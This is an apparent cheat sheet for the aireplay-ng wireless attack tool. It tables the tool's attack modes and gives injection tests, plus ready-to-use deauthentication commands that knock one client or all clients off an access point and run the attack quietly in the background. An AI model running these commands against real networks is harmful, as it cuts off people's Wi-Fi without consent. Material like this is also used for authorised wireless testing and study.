Aireplay-ng
Aireplay-ng is primarily useful for generating wireless traffic.
Aireplay-ng supports the following attacks. They are listed along with the corresponding number from the tool’s documentation.
| ATTACK | ATTACK NAME |
|---|---|
| 0 | Deauthentication |
| 1 | Fake Authentication |
| 2 | Interactive Packet Replay |
| 3 | ARP Request Replay Attack |
| 4 | KoreK ChopChop Attack |
| 5 | Fragmentation Attack |
| 6 | Café-Latte Attack |
| 7 | Client-Oriented Fragmentation Attack |
| 8 | WPA Migration Mode Attack |
| 9 | Injection Test |
1
2
3
4
5
# check if we can inject invisible APs. The injection test measures ping response times to the AP
sudo aireplay-ng -9 wlan0mon
# check if we can inject in a specific AP
sudo aireplay-ng -e <ap_name> -a <MAC> wlan0mon
Deauthentication Attack
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# deauth a client (1000000 is a large number of packets, to keep the deauth attack working for a while):
sudo aireplay-ng -0 10 -a <bssid> -c <client_MAC> wlan0mon
# To background the command and don't see output
sudo aireplay-ng --deauth 10 -a <bssid> -c <client_MAC> wlan0mon &> /dev/null &
# To deauth every client connected to a BSSID don't specify a client <MAC>
aireplay-ng --deauth 4 -a <bssid> wlan0mon &> /dev/null &
# Can be done as well by using broadcast MAC "FF:FF:FF:FF:FF:FF"
aireplay-ng --deauth 4 -a <bssid> -c FF:FF:FF:FF:FF:FF wlan0mon
# Same as above, but without expecting to receive probes
sudo aireplay-ng -e <ap_name> -a <MAC> -D wlan0mon
# if we have two wifi cards, wlan0mon and wlan1mon, card-to-card test, to make sure they can inject. if it says (5/7 error, still can be used to attack an AP)
sudo aireplay-ng -9 -i wlan1mon wlan0mon
Pro Tips
1
2
3
4
5
6
7
8
# with "jobs" we can see the jobs backgrounded with &. each has an ID
jobs
# kill all backgrounded aireplay processes.
killall aireplay-ng
# kill only the first process in the "jobs" list:
kill %1